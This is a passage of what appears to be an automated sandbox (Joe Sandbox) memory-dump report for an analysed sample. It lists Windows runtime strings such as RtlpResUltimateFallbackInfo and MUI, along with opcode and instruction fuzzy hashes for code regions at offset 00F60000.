                                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 00F9A2FB
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                            • API String ID: 0-2876891731
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: Cleanup Group$Threadpool!
                                                            • API String ID: 2994545307-4008356553
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: MUI
                                                            • API String ID: 0-1339004836
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: GlobalTags
                                                            • API String ID: 0-1106856819
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .mui
                                                            • API String ID: 0-1199573805
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: EXT-
                                                            • API String ID: 0-1948896318
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: BinaryHash
                                                            • API String ID: 0-2202222882
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: #
                                                            • API String ID: 0-1885708031
                                                            Strings
                                                            • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0101895E
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                            • API String ID: 0-702105204
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                            • Instruction ID: 927d46f0e10c620e92071dffafa3fd3c30c03073ecee0eade1c036be8ff5fabc
                                                            • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                            • Instruction Fuzzy Hash: C2B19475A006059FDB65DB94C940EEBBBF9FF84304F14845EEA8297798DB38EA05CB10
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                            • Instruction ID: 9f899a9296044fea73f0c991a74b7ca16e88d4fdba51377feec5ab01d7385866
                                                            • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                            • Instruction Fuzzy Hash: 9AB12771A0064AAFDB21DB68C850BBEB7F6AF85310F180169E652D7391DF34ED41EB90
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ba3c550e70a12891e9100a0ccddb6de84296348d9358ebd3c4ba172a16086894
                                                            • Instruction ID: e6a39f6d9a932d09c0931d710ca07aea70e826cee10cc215ff7cfb22e8eaf351
                                                            • Opcode Fuzzy Hash: ba3c550e70a12891e9100a0ccddb6de84296348d9358ebd3c4ba172a16086894
                                                            • Instruction Fuzzy Hash: 09C17970608341CFE764CF18C484BABB7E5BF88354F44492DE989872A1DB75E909DF92
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 393d19ae6b01ab490919fd5ec468e6f309ea42b3dbea45e8bfd7c5c4b5354299
                                                            • Instruction ID: f9d949da7770a66191fdad8c038b0dcc199be297cc2bc9184c2064e994849ad3
                                                            • Opcode Fuzzy Hash: 393d19ae6b01ab490919fd5ec468e6f309ea42b3dbea45e8bfd7c5c4b5354299
                                                            • Instruction Fuzzy Hash: 5AB18270A002658BDB64DF65C880BE9B3B1EF44710F1485EAE54AEB281EB34ED85DF61
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2333e3777f33246457bb85df05e5fc866280f57083fbca3d07e82f28b49f10b8
                                                            • Instruction ID: 4340d3c50f8eb2f8784928a459d3dc269bd8b8622da78412714291cfd80c9511
                                                            • Opcode Fuzzy Hash: 2333e3777f33246457bb85df05e5fc866280f57083fbca3d07e82f28b49f10b8
                                                            • Instruction Fuzzy Hash: 66A12632E0022D9FDB21DB99C844BFEBBB5AF01720F150125EA51AB2E0D7789D44EBD1
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b2722e0785ba113edcb44a1a6e84a71913ba6323ced81f459644bcc63c64d863
                                                            • Instruction ID: 3359cf7f3a1b4d92ddf88c5d34f5d3c0dbbd8e05a97995c88d31c29cc8c1435b
                                                            • Opcode Fuzzy Hash: b2722e0785ba113edcb44a1a6e84a71913ba6323ced81f459644bcc63c64d863
                                                            • Instruction Fuzzy Hash: C6A1E871B016169BDB25CF65C991BAA77F2FF44314F18402AEA85D7382DF34E811EB50
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a91d5e64bb13997e3a6b375a9a953153e88ae098e68e05d5d398d729ec19aa77
                                                            • Instruction ID: 56d10725c4a24724ed7565a383b36bfb42bd3f0e11e02e547bf3c9af0d0f5a48
                                                            • Opcode Fuzzy Hash: a91d5e64bb13997e3a6b375a9a953153e88ae098e68e05d5d398d729ec19aa77
                                                            • Instruction Fuzzy Hash: E7A1C9B2A04651AFC762DF18CD80B6ABBE9FF49704F050568F589DB652C738E900CB91
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                            • Instruction ID: b8f400986f124fcbda08f2437912af6135f5dc25c1900704f034addf8846a330
                                                            • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                            • Instruction Fuzzy Hash: DBB16771E0061ADFDF68DFA8C880AADBBF9FF48310F148169E954AB354D730A941CB90
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6fa4fdce2c5d2d1ea8073865ceaa99c0532bd83ec02a6e835c68183c1013e246
                                                            • Instruction ID: c9f4ee95a0ae38f4e788c1b6b84d568ca668f4f0c2b189ce80f548a3f5b39af4
                                                            • Opcode Fuzzy Hash: 6fa4fdce2c5d2d1ea8073865ceaa99c0532bd83ec02a6e835c68183c1013e246
                                                            • Instruction Fuzzy Hash: 8C91B171D00215AFDB15CFA8DC90BBEBBB5AF48710F144169E690EB345D7BAE9009BA0
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 79bd2cd51e45fe38b4fc3798880614fef4d039dc58d561132fa8c68593f82720
                                                            • Instruction ID: cf8b6a1f4139449e458d9017f5eab46f17d425dea1438c15b727973ef3f69271
                                                            • Opcode Fuzzy Hash: 79bd2cd51e45fe38b4fc3798880614fef4d039dc58d561132fa8c68593f82720
                                                            • Instruction Fuzzy Hash: 8A9186B6E002158FDB24EB58C840B7EB7A5EF8A724F198069ED40DB390E778DC01EB50
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0c4ca9d4a355a3b3effe141ab6876c4bcabfe4ed62c185f5df61957366af0776
                                                            • Instruction ID: 187bd919769e82157f070637b50dc6be1eb2b5bfcbbd06d6f0b96244086831ae
                                                            • Opcode Fuzzy Hash: 0c4ca9d4a355a3b3effe141ab6876c4bcabfe4ed62c185f5df61957366af0776
                                                            • Instruction Fuzzy Hash: 1681E4B1E002599FDB24CF6AC840ABEBBF9FB58750F14852EE455E7240E734E940DB94
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                            • Instruction ID: 1fc952c5ad8faadf0a710fe5fcbb69404a41cd4ce29be367baec4d23c2ab2c38
                                                            • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                            • Instruction Fuzzy Hash: F7815E71B00209DFDF99DF99C880AAFBBF6BF84310B1486A9DD569B345D634E901CB50
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 424a000b0a8b8a7d7d3e38bb7243e3ede749c09c205a2e529710747393d4be7e
                                                            • Instruction ID: 7b90ba15822a89e7bf7db801497f17d4586ed6b6ec095edfb9d3ca385532c011
                                                            • Opcode Fuzzy Hash: 424a000b0a8b8a7d7d3e38bb7243e3ede749c09c205a2e529710747393d4be7e
                                                            • Instruction Fuzzy Hash: C1816C71A0060AAFDB25CBA8C981FEEBBFAFF48314F10442DE555A7250D730AD05DB60
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c40951eb91ed891f3820643cae86730e813e259ba64995b5f22afef92a8e037e
                                                            • Instruction ID: 3c5e5598c73f772867d6fac2c0d6d4948e1852bddfacf91de6d04734cbe6191d
                                                            • Opcode Fuzzy Hash: c40951eb91ed891f3820643cae86730e813e259ba64995b5f22afef92a8e037e
                                                            • Instruction Fuzzy Hash: B471E1B5C04669DBCB25CF58C8907BEBBB4FF59750F24411AE982AB3A0D7359801EBD0
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 33ae0a5f2f838a7418ae21636f93bc71f4d0f0c2c9d6f33f5051ed4499d435f3
                                                            • Instruction ID: 5b94d2c662ccfadd44cdcf751719577e24e6e157e064877ee251c99ce039f3e0
                                                            • Opcode Fuzzy Hash: 33ae0a5f2f838a7418ae21636f93bc71f4d0f0c2c9d6f33f5051ed4499d435f3
                                                            • Instruction Fuzzy Hash: 187180B0D04204EFDB20EF59D981B9EBBF9FB81310F0641AAE6C0EB259C7368944DB54
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fac8acfa9b0e4c632673ce1519df7489283869de82962ef068165e70931141ef
                                                            • Instruction ID: 4ba3f59ffa89abdc4140a9282e154257f6772a4c6e92dc1bf7400764aa46fec9
                                                            • Opcode Fuzzy Hash: fac8acfa9b0e4c632673ce1519df7489283869de82962ef068165e70931141ef
                                                            • Instruction Fuzzy Hash: 8B718AB6B046428FC351DF28C480B6AB7E5FF85320F0485AAE8998B352DB38DD45DB91
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                            • Instruction ID: 0fbcf978a278ea250190681ec8da620bde35533a56dae8b8d2ba82ce26ccd70b
                                                            • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                            • Instruction Fuzzy Hash: FB717D71A00619EFCB10DFA9C984ADEBBF9FF48700F104569F585A7255EB38EA41CB90
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77a6e640571c0e555c27001f4541ad38cbd92c3b844289546b96023df87492f6
                                                            • Instruction ID: ed7c7a63fea8941459400d4a0a3698e3f631021d40ecc94e31b537c563d41204
                                                            • Opcode Fuzzy Hash: 77a6e640571c0e555c27001f4541ad38cbd92c3b844289546b96023df87492f6
                                                            • Instruction Fuzzy Hash: 4E710232200B11AFE7329F18CC45F5ABBE6FF44720F148459EAD68B2A1DB76E944DB50
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 21c0d44e2fa1f11fbfaf2dfd43c0c1c3f677b57c6d652373a4931dc1b29bff94
                                                            • Instruction ID: a081d8bc009898e11d4a2cb2be72231c4146901dd642bb46d2b9cf78b71870c7
                                                            • Opcode Fuzzy Hash: 21c0d44e2fa1f11fbfaf2dfd43c0c1c3f677b57c6d652373a4931dc1b29bff94
                                                            • Instruction Fuzzy Hash: 4581A472E0831A8FEB24CF98D484B6D77B1BF89320F15412DD900AB392C7799D41EB90
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a1b63e83755eeb633f299504add9a098410ce2a41a84728b8dae2ed92e3b088b
                                                            • Instruction ID: 9084a633c6f7ae840c2497f7f60b986102aff33946beff16c5dda7a7cf7bda24
                                                            • Opcode Fuzzy Hash: a1b63e83755eeb633f299504add9a098410ce2a41a84728b8dae2ed92e3b088b
                                                            • Instruction Fuzzy Hash: 93710971E10219AFDB16DF94CC81FEEBBB9FB04360F10816AF650A6290D774AA05CB90
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ceb04424a47bc893918233de4d821cb0f2b15337986059cf2ce2b3fdcc230be1
                                                            • Instruction ID: a51ee3f3939a685fb2056cdcfb5898927cd665b680975d153a12e0bfcc7cb3cc
                                                            • Opcode Fuzzy Hash: ceb04424a47bc893918233de4d821cb0f2b15337986059cf2ce2b3fdcc230be1
                                                            • Instruction Fuzzy Hash: 5F51CEB2644612EFD311DA68C884F5FB7E8EBC9750F004979BA82DB250DB75ED04C7A2
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            • Opcode Fuzzy Hash: b63ec31008220e9ac0f9b1fe2b291d2b80d11d51a37545576dc0be65e265ce3a
                                                            • Instruction Fuzzy Hash: C441C1726087419FC320DF68D840A6AB7E9FFC8700F144A69F9D497688E738E944C7A6
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 08efeda78db8bac8c0f2fd8729f5ce67e390e863ba9a5680d98263ad49ca0c96
                                                            • Instruction ID: af8fb9ea9e1cca77f0885cdc26da7d0ca100661e6fa81298d8f3b2536c542fe6
                                                            • Opcode Fuzzy Hash: 08efeda78db8bac8c0f2fd8729f5ce67e390e863ba9a5680d98263ad49ca0c96
                                                            • Instruction Fuzzy Hash: 6C41E370A043018BEB25DF18D884F2BB7E6EFA5364F14442DF99587291DB35ED02DB51
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                            • Instruction ID: 62c31830fbdfbcab64b526cc94f644a3435a40806233fe3e7087e3cde844dd53
                                                            • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                            • Instruction Fuzzy Hash: E9311672A05344AFDF11CB68CC80BAABBF9EF05350F0441A5F855D7352C6789984EBA4
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0e0616254231a40fa1a1cfe765065abf2e8bb85e6819128528c59a17b70c6911
                                                            • Instruction ID: 979608dd058ba0b99ceca8d9abb7763f282a6a754a289e016b8f6485c38067bf
                                                            • Opcode Fuzzy Hash: 0e0616254231a40fa1a1cfe765065abf2e8bb85e6819128528c59a17b70c6911
                                                            • Instruction Fuzzy Hash: 3031A671751705ABD722AF65CC81FAF76B9AB8DB50F100028F640AB392DEA9DD01D7A0
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1633eb148d1f3d69e1f32626d2dfbf3f695a412247eb599956ef5f39d4ebbbfd
                                                            • Instruction ID: 5345d758fcc70e4d154d8a289cfc0ec8f2bba5be5f9bf40ef2eab0e9e5911d61
                                                            • Opcode Fuzzy Hash: 1633eb148d1f3d69e1f32626d2dfbf3f695a412247eb599956ef5f39d4ebbbfd
                                                            • Instruction Fuzzy Hash: FD319FB26092048FC361DF19D880B6AB7E5FB85360F0A44BDE9D5DB652D736A800CB95
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 86affa326c5cfa30fe85d0049ea6c91fe4f43df0d1e2914aae7aa5b85d2cedc3
                                                            • Instruction ID: 96485d9fd4d034d48452b0939bf69ee330dca79c70f8ed21a83aeb641545611e
                                                            • Opcode Fuzzy Hash: 86affa326c5cfa30fe85d0049ea6c91fe4f43df0d1e2914aae7aa5b85d2cedc3
                                                            • Instruction Fuzzy Hash: 5B41E271500B44DFDB22CF28C885FEA77E5BF59314F144429E6998B262CB74E800EB60
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1a356c5a5ed80adbc6b4e75ff6f3e95231dbd4ddf3e35ed1c767841f6d7749ff
                                                            • Instruction ID: 11a9c6152a35c0de2daf6f8d362f16c9c7f24786fda6885bc4cb774d993c76ac
                                                            • Opcode Fuzzy Hash: 1a356c5a5ed80adbc6b4e75ff6f3e95231dbd4ddf3e35ed1c767841f6d7749ff
                                                            • Instruction Fuzzy Hash: 7B318AB16083058FD360EF29C881B6AB7E5FB84720F0A457DF9D5DB291E730E8048B95
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f55eeb8e594937c2342d58d838575a4e1a917caf7b5e6c19a55b35a1c5ed81de
                                                            • Instruction ID: 6b0796c4f521adc24e7560278814334a7e578b25d58b7a38fabf9780b3a9da3a
                                                            • Opcode Fuzzy Hash: f55eeb8e594937c2342d58d838575a4e1a917caf7b5e6c19a55b35a1c5ed81de
                                                            • Instruction Fuzzy Hash: 86318272601A85DBF327579DCD48F56BBD8AB41744F1908E0BBC5AB6D2DB68D881C220
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 84cf23a3704d860e3387081ea14cd40416d13d4e34648f3eedb8f4b28af738ac
                                                            • Instruction ID: e76253d22a35d84101b3a7d75b5b4f7aa4f285d3b1a4019ba6d35629d315db59
                                                            • Opcode Fuzzy Hash: 84cf23a3704d860e3387081ea14cd40416d13d4e34648f3eedb8f4b28af738ac
                                                            • Instruction Fuzzy Hash: 52310175A00619ABDB15DF98CC41FAEB7B6EB44B80F844169F940AB240DB70ED00CBA4
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4fa927f731eb32a4d07a27013cd5da2541468e39056a1699223b431c0ea63765
                                                            • Instruction ID: d0f31979961f10a040212b48c8f03eca973302582e06e464a3df3dc0e00055fb
                                                            • Opcode Fuzzy Hash: 4fa927f731eb32a4d07a27013cd5da2541468e39056a1699223b431c0ea63765
